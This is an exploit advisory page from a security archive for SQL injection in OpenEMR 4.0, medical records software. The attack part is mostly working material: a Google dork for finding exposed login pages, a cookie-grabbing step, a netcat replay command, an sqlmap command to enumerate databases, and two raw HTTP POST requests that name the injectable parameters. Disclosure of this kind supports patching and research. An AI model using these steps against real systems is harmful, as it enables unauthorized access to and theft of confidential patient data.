Open EMR 4.0 SQL Injection

Open EMR 4.0 SQL Injection: Posted Oct 21, 2011; Authored by Houssam Sahli, Mehdi Boukazoula; Open EMR version 4.0 suffers from multiple remote SQL injection vulnerabilities.; tags | exploit, remote, vulnerability, sql injection; SHA-256 | 115ccc61323b5f3e6518c7a2084a9bd363254a02e7ef505592e749b25644dfd5; Download | Favorite | View

Open EMR 4.0 SQL Injection

# Exploit Title: Open EMR
# Google Dork: inurl:"/interface/login/login_frame.php" intitle:"Login" intext:"Username:"
# Date: 3 / 08 / 2011 .
# Author: Mehdi Boukazoula ; Houssam Sahli .
# Software Link with patch : https://www.oemr.org/wiki/OpenEMR_Downloads
# Version: v 4.0 full patched
# Tested on: v 4.0
# Description : the authenticated user can exploit this vulnerability by getting the cookie from browser using url javascript:alert(document.cookie) ,put it in request file with sql command and exploit:

root@# cat request.txt | nc -vv yourhost 80
or simply use sqlmap like this :
root@# sqlmap -r request.txt -p "YOUR PARAMETER" --dbs
--------------------------------------------------------------------------------------------------------

---Request1 : Affected parameters : provider_id + pc_category
POST https://127.0.0.1/openemr/interface/main/calendar/index.php?module=PostCalendar&func=search HTTP/1.1
Accept-language: fr,fr-fr;q=0.8,en-us;q=0.5,en;q=0.3
Accept-encoding: identity
Keep-alive: 115
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-agent: Mozilla/5.0 (X11; U; Linux i686; fr; rv:1.9.2.10) Gecko/20100922 Ubuntu/10.10 (maverick) Firefox/3.6.10
Accept-charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Host: 127.0.0.1
Referer: https://127.0.0.1/openemr/interface/main/calendar/index.php?module=PostCalendar&func=search
Cookie: PUT-THE-COOKIE-HERE
Content-type: application/x-www-form-urlencoded
Proxy-connection: keep-alive

pc_keywords=bob&provider_id=_ALL_&end=08/10/2011&pc_category=&submit=Submit&start=08/03/2011&pc_keywords_andor=AND&pc_facility=
--------------------------------------------------------------
---Request2 : Affected parameters : form_patient_id
POST https://127.0.0.1/openemr/interface/reports/chart_location_activity.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; U; Linux i686; fr; rv:1.9.2.10) Gecko/20100922 Ubuntu/10.10 (maverick) Firefox/3.6.10 Paros/3.2.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: fr,fr-fr;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: https://127.0.0.1/openemr/interface/reports/chart_location_activity.php
Cookie: PUT-THE-COOKIE-HERE
Content-Type: application/x-www-form-urlencoded
Content-Length: 38

form_refresh=true&form_patient_id=patient
---------------------------------------------------------------

Top Authors In Last 30 Days

Red Hat 272 files
Ubuntu 56 files
Debian 19 files
LiquidWorm 18 files
Apple 9 files
Gentoo 5 files
Google Security Research 3 files
Chokri Hammedi 3 files
Alter Prime 3 files
Valentin Lobstein 2 files

File Archives

Systems

AIX (430)
Apple (2,126)
BSD (378)
CentOS (61)
Cisco (1,954)
Debian (7,163)
Fedora (1,693)
FreeBSD (1,247)
Gentoo (4,604)
HPUX (881)
iOS (393)
iPhone (108)
IRIX (220)
Juniper (71)
Linux (51,937)
Mac OS X (696)
Mandriva (3,105)
NetBSD (256)
OpenBSD (490)
RedHat (17,337)
Slackware (941)
Solaris (1,615)
SUSE (1,444)
Ubuntu (9,979)
UNIX (9,475)
UnixWare (188)
Windows (6,784)
Other

Open EMR 4.0 SQL Injection

Open EMR 4.0 SQL Injection

File Archive:

November 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Open EMR 4.0 SQL Injection

Share This

Open EMR 4.0 SQL Injection

File Archive:

November 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems